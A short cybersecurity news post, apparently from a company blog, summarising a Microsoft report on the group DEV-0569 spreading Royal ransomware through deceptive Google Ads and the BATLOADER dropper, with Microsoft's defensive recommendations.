In a recent report, Microsoft has revealed that a group is carrying out threatening activities, which are in development to distribute Royal Ransomware through Google Ads. This ransomware is relatively new, but it is already doing a lot of damage to the systems where it is used. The following lines will explain more about this method, and the damage it does.
Royal Ransomware wreaks havoc, and Microsoft is close behind
This way of distributing malware was discovered by the team from the parent company of Windows at the end of October. The group behind the suspicious activities and malware was identified under the name DEV-0569.
“Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation,” the Microsoft Security Threat Intelligence team stated in their report.
The method is simple: they use Google Ads to place deceptive advertisements, which trick users into accessing malware download links. These masquerade as well-known and legitimate programs, such as Adobe Flash Player, AnyDesk, LogMeIn, Microsoft Teams, and Zoom.
The downloader used to get the malware is a variety known as BATLOADER, a dropper that manages to drive the next-stage payloads. That’s how the malware is distributed. The Microsoft team also noticed that Royal shares overlaps with another malware called ZLoader.
BATLOADER has been arduously analyzed; we have the eSentire and VMware analyses. In both, it has been observed that this malware has great secrecy and persistence, added to the fact that it uses SEO (Search Engine Optimization) poisoning to deceive users. That way, they download a program from contaminated websites or sites created by attackers.
At the same time, it has been observed that download links have been distributed through spam emails, deceptive forums, blog comments, and even contact forms that can be found on the websites of organizations that are targeted by hackers.
DEV-0569 diversifies its operations
Microsoft also points out that “DEV-0569 has used varied infection chains using PowerShell and batch scripts that ultimately led to the download of malware payloads like information stealers or a legitimate remote management tool used for persistence on the network… The management tool can also be an access point for the staging and spread of ransomware.”
Another tool they use is NSudo, which allows highly privileged programs to be launched to weaken defenses through added logs, thus disabling antiviruses. By using Google Ads, the DEV-0569 group diversifies their operations and manages to be an initial access broker for other ransomware and malware such as Emotet, IcedID, and Qakbot.
Microsoft’s recommendations are: “Since DEV-0569’s phishing scheme abuses legitimate services, organizations can also leverage mail flow rules to capture suspicious keywords or review broad exceptions, such as those related to IP ranges and domain-level allow lists.”
Keep in touch with our blog to read the latest news and innovations in the cybersecurity world.
Photo by Myriam Jessier on Unsplash.
Facebook: Eagle Tech Corp
LinkedIn: Eagle Tech
YouTube: Eagle Tech Corp